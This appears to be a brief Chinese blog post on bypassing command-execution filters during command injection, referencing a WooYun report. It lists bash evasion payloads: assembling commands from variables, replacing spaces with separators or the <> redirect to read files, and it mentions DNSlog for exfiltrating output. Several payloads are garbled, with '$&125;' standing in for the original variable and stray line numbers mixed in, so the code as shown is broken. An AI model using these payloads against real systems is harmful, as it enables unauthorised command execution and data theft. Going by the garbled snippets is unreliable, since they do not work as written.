命令执行限制绕过

原因:中关村在线命令执行

其中wooyun给的方案是使用*unix环境变量中的分隔符进行对空格的绕过。

Linux 下:

如果存在命令执行限制,或者执行命令无显示,不妨这样试试
在bash命令中,用赋值方式绕过。例如:

执行ls命令
a=l;b=s;$a$b

cat hello文件内容:

1
a=c;b=at;c=he;d=llo;$a$b $&125;$&125;

绕过空格

1
2
$&125;
cat$&125;hello

或者在读取文件的时候利用重定向符

1
2
<>
cat<>hello

利用CloudEyeDNSlog,中转记录。

!坚持技术分享,您的支持将鼓励我继续创作!